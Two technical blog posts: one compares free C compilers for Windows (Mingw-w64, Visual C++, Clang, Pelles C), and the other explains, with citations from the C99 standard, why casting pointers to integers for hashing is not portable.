Before I get into the specifics, let me point out a glaring problem common to all four: Unicode arguments and filenames. Microsoft jumped the gun and adopted UTF-16 early. UTF-16 is a kludge, a worst of all worlds, being a variable length encoding (surrogate pairs), backwards incompatible (unlike UTF-8), and having byte-order issues (BOM). Most Win32 functions that accept strings generally come in two flavors, ANSI and UTF-16. The standard, portable C library functions wrap the ANSI-flavored functions. This means portable C programs can’t interact with Unicode filenames. They must call the non-portable, Windows-specific versions. This includes main itself, which is only handed ANSI-truncated arguments.

Compare this to unix-like systems, which generally adopted UTF-8, but rather as a convention than as a hard rule. The operating system doesn’t know or care about Unicode. Program arguments and filenames are just zero-terminated bytestrings. Implicitly decoding these as UTF-8 would be a mistake anyway. What happens when the encoding isn’t valid?

This doesn’t have to be a problem on Windows. A Windows standard C library could connect to Windows’ Unicode-flavored functions and encode to/from UTF-8 as needed, allowing portable programs to maintain the bytestring illusion. It’s only that none of the existing standard C libraries do it this way.

Mingw-w64

Of course my first natural choice is MinGW, specifically the Mingw-w64 fork. It’s GCC ported to Windows. You can continue relying on GCC-specific features when you need them. It’s got all the core language features up through C11, plus the common extensions. It’s probably packaged by your Linux distribution of choice, making it trivial to cross-compile programs and libraries from Linux — and with Wine you can even execute them on x86. Like regular GCC, it outputs GDB-friendly DWARF debugging information, so you can debug applications with GDB (my favorite).

If I’m using Mingw-w64 on Windows, I prefer to do so from inside Cygwin. Since it provides a complete POSIX environment, it maximizes portability for the whole tool chain. This isn’t strictly required.

However, it has one big flaw. Unlike unix-like systems, Windows doesn’t supply a system standard C library. That’s the compiler’s job. But Mingw-w64 doesn’t have one. Instead it links against msvcrt.dll, which isn’t officially supported by Microsoft. It just happens to exist on modern Windows installations. Since it’s not supported, it’s way out of date and doesn’t support much of C99, let alone C11. A lot of these problems are patched over by the compiler, but if you’re relying on Mingw-w64, you still have to stick to some C89 library features, such as limiting yourself to the C89 printf specifiers.

Update: Mārtiņš Možeiko has pointed out __USE_MINGW_ANSI_STDIO, an undocumented feature that fixes the printf family.

Visual C++

The behemoth usually considered in this situation is Visual Studio and the Visual C++ build tools. I strongly prefer open source development tools, and Visual Studio obviously the least open source option, but at least it’s cost-free these days. Now, I have absolutely no interest in Visual Studio, but fortunately the Visual C++ compiler and associated build tools can be used standalone, supporting both C and C++.

Included is a “vcvars” batch file — vcvars64.bat for x64. Execute that batch file in a cmd.exe console and the Visual C++ command line build tools will be made available in that console and in any programs executed from it (your editor). It includes the compiler (cl.exe), linker (link.exe), assembler (ml64.exe), disassembler (dumpbin.exe), and more. It also includes a mostly POSIX-complete make called nmake.exe. All these tools are noisy and print a copyright banner on every invocation, so get used to passing -nologo every time, which suppresses some of it.

When I said behemoth, I meant it. In my experience it literally takes hours (unattended) to install Visual Studio 2015. The good news is you don’t actually need it all anymore. The build tools are available standalone. While it’s still a larger and slower installation process than it really should be, it’s is much more reasonable to install. It’s good enough that I’d even say I’m comfortable relying on it for Windows builds.

That being said, it’s not without its flaws. Microsoft has never announced any plans to support C99. They only care about C++, with C as a second class citizen. Since C++11 incorporated most of C99 and Microsoft supports C++11, Visual Studio 2015 very nearly supports all of C99, even more than Mingw-w64. The only things missing as far as I can tell are variable length arrays (VLAs), complex numbers, and C99’s array parameter declarators, since none of these were adopted by C++. Some C99 features are considered extensions (as they would be for C89), so you’ll also get warnings about them, which can be disabled.

The command line interface (option flags, intermediates, etc.) isn’t quite reconcilable with the unix-like ecosystem (i.e. GCC, Clang), so you’ll need separate Makefiles, or you’ll need to use a build system that generates Visual C++ Makefiles.

Debugging is a major problem. Visual C++ outputs separate .pdb program database files, which aren’t usable from GDB. Visual Studio has a built-in debugger, though it’s not included in the standalone Visual C++ build tools. I’m still searching for a decent debugging solution for this scenario. I tried WinDbg, but I can’t stand it.

In general the output code performance is on par with GCC and Clang, so you’re not really gaining or losing performance with Visual C++.

Clang

Unsurprisingly, Clang has been ported to Windows. It’s like Mingw-w64 in that you get the same features and interface across platforms.

Unlike Mingw-w64, it doesn’t link against msvcrt.dll. Instead it relies directly on the official Windows SDK. You’ll basically need to install the Visual C++ build tools as if were going to build with Visual C++. This means no practical cross-platform builds and you’re still relying on the proprietary Microsoft toolchain. In the past you even had to use Microsoft’s linker, but LLVM now provides its own.

It generates GDB-friendly DWARF debug information (in addition to CodeView) so in theory you can debug with GDB again. I haven’t given this a thorough evaluation yet.

Pelles C

Finally there’s Pelles C. It’s cost-free but not open source. It’s a reasonable, small install that includes a full IDE with an integrated debugger and command line tools. It has its own C library and Win32 SDK with the most complete C11 support around. It also supports OpenMP 3.1. All in all it’s pretty nice and is something I wouldn’t be afraid to rely upon for Windows builds.

Like Visual C++, it has a couple of “povars” batch files to set up the right environment, which includes a C compiler, linker, assembler, etc. The compiler interface mostly mimics cl.exe, though there are far fewer code generation options. The make program, pomake.exe, mimics nmake.exe, but is even less POSIX-complete. The compiler’s output code performance is also noticeably poorer than GCC, Clang, and Visual C++. It’s definitely a less mature compiler.

It outputs CodeView debugging information, so GDB is of no use. The best solution is to simply use the compiler built into the IDE, which can be invoked directly from the command line. You don’t normally need to code from within the IDE just to use the debugger.

Like Visual C++, it’s Windows only, so cross-compilation isn’t really in the picture.

If performance isn’t of high importance, and you don’t require specific code generation options, then Pelles C is a nice choice for Windows builds.

Other Options

I’m sure there are a few other options out there, and I’d like to hear about them so I can try them out. I focused on these since they’re all cost free and easy to download. If I have to register or pay, then it’s not going to beat these options.

tags: [ c cpp win32 ]

You Can't Always Hash Pointers in C

Occasionally I’ve needed to key a hash table with C pointers. I don’t care about the contents of the object itself — especially if it might change — just its pointer identity. For example, suppose I’m using null-terminated strings as keys and I know these strings will always be interned in a common table. These strings can be compared directly by their pointer values (str_a == str_b) rather than, more slowly, by their contents (strcmp(str_a, str_b) == 0). The intern table ensures that these expressions both have the same result.

As a key in a hash table, or other efficient map/dictionary data structure, I’ll need to turn pointers into numerical values. However, C pointers aren’t integers. Following certain rules it’s permitted to cast pointers to integers and back, but doing so will reduce the program’s portability. The most important consideration is that the integer form isn’t guaranteed to have any meaningful or stable value. In other words, even in a conforming implementation, the same pointer might cast to two different integer values. This would break any algorithm that isn’t keenly aware of the implementation details.

To show why this is, I’m going to be citing the relevant parts of the C99 standard (ISO/IEC 9899:1999). The draft for C99 is freely available (and what I use myself since I’m a cheapass). My purpose is not to discourage you from casting pointers to integers and using the result. The vast majority of the time this works fine and as you would expect. I just think it’s an interesting part of the language, and C/C++ programmers should be aware of potential the trade-offs.

Integer to pointer casts

What does the standard have to say about casting pointers to integers? §6.3.2.3¶5:

An integer may be converted to any pointer type. Except as previously specified, the result is implementation-defined, might not be correctly aligned, might not point to an entity of the referenced type, and might be a trap representation.

It also includes a footnote:

The mapping functions for converting a pointer to an integer or an integer to a pointer are intended to be consistent with the addressing structure of the execution environment.

Casting an integer to a pointer depends entirely on the implementation. This is intended for things like memory mapped hardware. The programmer may need to access memory as a specific physical address, which would be encoded in the source as an integer constant and cast to a pointer of the appropriate type.

int
read_sensor_voltage(void)
{
    return *(int *)0x1ffc;
}

It may also be used by a loader and dynamic linker to compute the virtual address of various functions and variables, then cast to a pointer before use.

Both cases are already dependent on implementation defined behavior, so there’s nothing lost in relying on these casts.

An integer constant expression of 0 is a special case. It casts to a NULL pointer in all implementations (§6.3.2.3¶3). However, a NULL pointer doesn’t necessarily point to address zero, nor is it necessarily a zero bit pattern (i.e. beware memset and calloc on memory with pointers). It’s just guaranteed never to compare equally with a valid object, and it is undefined behavior to dereference.

Pointer to integer casts

What about the other way around? §6.3.2.3¶6:

Any pointer type may be converted to an integer type. Except as previously specified, the result is implementation-defined. If the result cannot be represented in the integer type, the behavior is undefined. The result need not be in the range of values of any integer type.

Like before, it’s implementation defined. However, the negatives are a little stronger: the cast itself may be undefined behavior. I speculate this is tied to integer overflow. The last part makes pointer to integer casts optional for an implementation. This is one way that the hash table above would be less portable.

When the cast is always possible, an implementation can provide an integer type wide enough to hold any pointer value. §7.18.1.4¶1:

The following type designates a signed integer type with the property that any valid pointer to void can be converted to this type, then converted back to pointer to void, and the result will compare equal to the original pointer:

intptr_t

The following type designates an unsigned integer type with the property that any valid pointer to void can be converted to this type, then converted back to pointer to void, and the result will compare equal to the original pointer:

uintptr_t

These types are optional.

The take-away is that the integer has no meaningful value. The only guarantee is that the integer can be cast back into a void pointer that will compare equally. It would be perfectly legal for an implementation to pass these assertions (and still sometimes fail).

void
example(void *prt_a, void *ptr_b)
{
    if (ptr_a == ptr_b) {
        uintptr_t int_a = (uintptr_t)ptr_a;
        uintptr_t int_b = (uintptr_t)ptr_b;
        assert(int_a != int_b);
        assert((void *)int_a == (void *)int_b);
    }
}

Since the bits don’t have any particular meaning, arithmetic operations involving them will also have no meaning. When a pointer might map to two different integers, the hash values might not match up, breaking hash tables that rely on them. Even with uintptr_t provided, casting pointers to integers isn’t useful without also relying on implementation defined properties of the result.

Reasons for this pointer insanity

What purpose could such strange pointer-to-integer casts serve?

A security-conscious implementation may choose to annotate pointers with additional information by setting unused bits. It might be for baggy bounds checks or, someday, in an undefined behavior sanitizer. Before dereferencing annotated pointers, the metadata bits would be checked for validity, and cleared/set before use as an address. Or it may map the same object at multiple virtual addresses) to avoid setting/clearing the metadata bits, providing interoperability with code unaware of the annotations. When pointers are compared, these bits would be ignored.

When these annotated pointers are cast to integers, the metadata bits will be present, but a program using the integer wouldn’t know their meaning without tying itself closely to that implementation. Completely unused bits may even be filled with random garbage when cast. It’s allowed.

You may have been thinking before about using a union or char * to bypass the cast and access the raw pointer bytes, but you’d run into the same problems on the same implementations.

Conforming programs

The standard makes a distinction between strictly conforming programs (§4¶5) and conforming programs (§4¶7). A strictly conforming program must not produce output depending on implementation defined behavior nor exceed minimum implementation limits. Very few programs fit in this category, including any program using uintptr_t since it’s optional. Here are more examples of code that isn’t strictly conforming:

    printf("%zu", sizeof(int)); // §6.5.3.4
    printf("%d", -1 >> 1);      // §6.5¶4
    printf("%d", MAX_INT);      // §5.2.4.2.1

On the other hand, a conforming program is allowed to depend on implementation defined behavior. Relying on meaningful, stable values for pointers cast to uintptr_t/intptr_t is conforming even if your program may exhibit bugs on some implementations.

tags: [ c cpp ]